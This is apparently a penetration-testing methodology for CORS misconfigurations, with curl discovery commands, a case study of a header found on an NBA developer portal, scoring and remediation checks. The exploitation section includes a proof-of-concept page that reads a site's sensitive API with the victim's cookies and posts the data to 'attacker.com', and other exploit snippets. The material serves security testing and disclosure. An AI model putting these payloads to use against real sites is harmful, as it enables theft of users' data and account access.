CORS Vulnerability Analysis Methodology¶
Overview¶
Cross-Origin Resource Sharing (CORS) misconfigurations represent a significant security risk, particularly when combined with credential inclusion. This methodology covers discovery, verification, and exploitation of CORS vulnerabilities.
Understanding CORS¶
Basic Concepts¶
- Same-Origin Policy: Browser security model restricting cross-origin requests
- CORS Headers: Server responses that relax same-origin restrictions
- Preflight Requests: OPTIONS requests for complex cross-origin operations
- Credential Inclusion: Cookies and authentication headers in cross-origin requests
Key CORS Headers¶
Access-Control-Allow-Origin: *|<origin>|null
Access-Control-Allow-Credentials: true|false
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
Access-Control-Allow-Headers: Content-Type, Authorization, X-Custom-Header
Access-Control-Max-Age: 86400
Discovery Techniques¶
1. Basic CORS Header Inspection¶
# Check for CORS headers on any endpoint
curl -s -I https://target.com/
# Look specifically for problematic configurations
curl -s -I https://target.com/ | grep -i "access-control"
2. Origin Reflection Testing¶
# Test if server reflects arbitrary origins
curl -s -H "Origin: https://evil.com" -I https://target.com/ | grep -i "access-control-allow-origin"
# Test for null origin reflection
curl -s -H "Origin: null" -I https://target.com/ | grep -i "access-control-allow-origin"
3. Subdomain Wildcard Testing¶
# Test if subdomain wildcards are accepted
curl -s -H "Origin: https://evil.target.com" -I https://target.com/
curl -s -H "Origin: https://target.com.evil.com" -I https://target.com/
4. Development Environment Origins¶
# Test common development origins
curl -s -H "Origin: http://localhost:3000" -I https://target.com/
curl -s -H "Origin: http://127.0.0.1:3000" -I https://target.com/
curl -s -H "Origin: http://localhost:8080" -I https://target.com/
Common Misconfigurations¶
1. Wildcard with Credentials¶
Vulnerable Configuration:
Impact: High - Any origin can make credentialed requests2. Null Origin Reflection¶
Vulnerable Configuration:
Impact: High - Data URIs and sandboxed iframes can bypass CORS3. Development Origins in Production¶
Vulnerable Configuration (NBA Case Study):
Impact: Medium-High - Localhost-based attacks possible4. Insufficient Origin Validation¶
Vulnerable Configuration:
// Server-side code that insufficiently validates origins
if (origin.includes('.trusted.com')) {
res.setHeader('Access-Control-Allow-Origin', origin);
}
Verification Methodology¶
1. Preflight Request Testing¶
# Send OPTIONS preflight request
curl -s -X OPTIONS \
-H "Origin: https://evil.com" \
-H "Access-Control-Request-Method: POST" \
-H "Access-Control-Request-Headers: Content-Type" \
https://target.com/api/endpoint
2. Actual Cross-Origin Request¶
# Follow up with actual request
curl -s -X POST \
-H "Origin: https://evil.com" \
-H "Content-Type: application/json" \
-d '{"test": "data"}' \
https://target.com/api/endpoint
3. Credential Inclusion Testing¶
# Test with authentication cookies
curl -s -X GET \
-H "Origin: https://evil.com" \
-H "Cookie: session=abc123" \
https://target.com/api/user/profile
Exploitation Strategies¶
1. HTML-Based Exploitation¶
<!DOCTYPE html>
<html>
<head>
<title>CORS PoC</title>
</head>
<body>
<script>
// Exploit CORS misconfiguration
fetch('https://target.com/api/sensitive', {
method: 'GET',
credentials: 'include' // Include cookies/auth
})
.then(response => response.json())
.then(data => {
// Exfiltrate sensitive data
fetch('https://attacker.com/collect', {
method: 'POST',
body: JSON.stringify(data)
});
});
</script>
</body>
</html>
2. JavaScript-Based Exploitation¶
// Advanced CORS exploitation
const exploitCORS = async () => {
try {
// Test if vulnerable endpoint is accessible
const response = await fetch('https://target.com/api/admin', {
method: 'POST',
credentials: 'include',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify({
'action': 'get_users',
'admin': true
})
});
if (response.ok) {
const data = await response.json();
// Data successfully retrieved via CORS bypass
console.log('Sensitive data:', data);
}
} catch (error) {
console.log('CORS request blocked:', error);
}
};
3. SWF-Based Exploitation (Legacy)¶
// For applications still supporting Flash
System.security.allowDomain("*");
System.security.allowInsecureDomain("*");
var request = new URLRequest("https://target.com/api/sensitive");
request.method = URLRequestMethod.GET;
var loader = new URLLoader();
loader.load(request);
NBA Case Study Analysis¶
Discovery Process¶
- Initial Scan: Standard header inspection of NBA subdomains
- Developer Portal: Found
developerportal.nba.comwith 404 response - Header Analysis: Discovered problematic CORS configuration
- Verification: Confirmed headers present and exploitable
Vulnerable Configuration Found¶
HTTP/1.1 404 Not Found
Access-Control-Allow-Origin: http://127.0.0.1:3000
Access-Control-Allow-Credentials: true
Content-Type: text/html; charset=UTF-8
Exploitation Scenario¶
<!-- Hosted on http://127.0.0.1:3000 -->
<script>
fetch('https://developerportal.nba.com/api/whatever', {
credentials: 'include',
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({'test': 'data'})
})
.then(r => r.text())
.then(data => console.log(data));
</script>
Risk Assessment¶
- Severity: Medium-High
- Prerequisites: Victim visiting attacker-controlled localhost page
- Impact: Potential unauthorized API access with user credentials
- Likelihood: Low-Medium (requires specific setup)
Advanced Testing Techniques¶
1. Automated CORS Testing¶
# Create target list
echo "https://target.com" > targets.txt
echo "https://api.target.com" >> targets.txt
# Test each target with multiple origins
while read target; do
echo "Testing $target"
for origin in "https://evil.com" "http://localhost:3000" "null"; do
curl -s -H "Origin: $origin" -I "$target" | grep -i "access-control"
done
done < targets.txt
2. CORS Scanner Integration¶
# Use specialized CORS testing tools
nuclei -t cors/ -l targets.txt
# Custom nuclei template for CORS
nuclei -t /path/to/cors-localhost.yaml -l targets.txt
3. Browser Automation Testing¶
// Puppeteer-based CORS testing
const puppeteer = require('puppeteer');
const testCORS = async (target, origin) => {
const browser = await puppeteer.launch();
const page = await browser.newPage();
// Intercept network requests
await page.setRequestInterception(true);
page.on('request', req => {
if (req.url().includes(target)) {
req.continue({
headers: {
...req.headers(),
'Origin': origin
}
});
} else {
req.continue();
}
});
// Check response headers
page.on('response', response => {
const corsHeader = response.headers()['access-control-allow-origin'];
if (corsHeader === origin) {
console.log(`CORS bypass possible: ${target} allows ${origin}`);
}
});
await page.goto(target);
await browser.close();
};
Remediation Verification¶
1. Proper CORS Configuration¶
# Secure configuration
Access-Control-Allow-Origin: https://trusted-domain.com
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET, POST
Access-Control-Max-Age: 86400
2. Origin Validation Testing¶
# Verify fix blocks malicious origins
curl -s -H "Origin: https://evil.com" -I https://target.com/ | grep -i "access-control"
# Should return no CORS headers or explicitly deny
# Verify legitimate origins still work
curl -s -H "Origin: https://legitimate.com" -I https://target.com/ | grep -i "access-control"
# Should return appropriate CORS headers
3. Regression Testing¶
# Test all previous vulnerable configurations
for origin in "null" "http://localhost:3000" "https://evil.com"; do
result=$(curl -s -H "Origin: $origin" -I https://target.com/ | grep -i "access-control-allow-origin")
if [[ -n "$result" ]]; then
echo "WARNING: Still vulnerable to $origin"
fi
done
Impact Assessment Framework¶
Severity Calculation¶
CORS Severity = Base Score × Origin Factor × Credential Factor × Endpoint Factor
Base Score:
- Simple reflection: 3.0
- Wildcard with credentials: 7.0
- Null origin reflection: 6.0
Origin Factor:
- Any origin (*): 1.0
- Attacker-controlled domain: 0.8
- Localhost/development: 0.6
- Subdomain bypass: 0.9
Credential Factor:
- No credentials: 0.3
- Credentials included: 1.0
Endpoint Factor:
- Public endpoint: 0.5
- Authentication required: 0.8
- Admin/sensitive endpoint: 1.0
Business Impact¶
- Low: Information disclosure from public endpoints
- Medium: Unauthorized actions with user privileges
- High: Admin access or sensitive data exposure
- Critical: Complete application compromise
Tools and Resources¶
1. Manual Testing Tools¶
# Basic CORS testing
curl, wget, httpie
# Browser developer tools
Network tab, Console, Security tab
2. Automated Scanners¶
# Nuclei CORS templates
nuclei -t cors-misconfig.yaml
# Custom CORS scanner
corscheck.py, cors-scanner.rb
3. Browser Extensions¶
- CORS Unblock (for testing)
- CORS Toggle (development)
- Postman (API testing)
Best Practices¶
1. Testing Methodology¶
- Always test multiple origin variations
- Verify both preflight and actual requests
- Test with and without credentials
- Check different HTTP methods
2. Documentation¶
- Record exact headers and responses
- Document exploitation steps clearly
- Include proof-of-concept code
- Assess real-world impact accurately
3. Responsible Disclosure¶
- Verify vulnerability before reporting
- Provide clear remediation guidance
- Include severity assessment rationale
- Follow up on fix implementation
Classification: Internal Methodology
Last Updated: September 2025
Source: NBA developerportal.nba.com analysis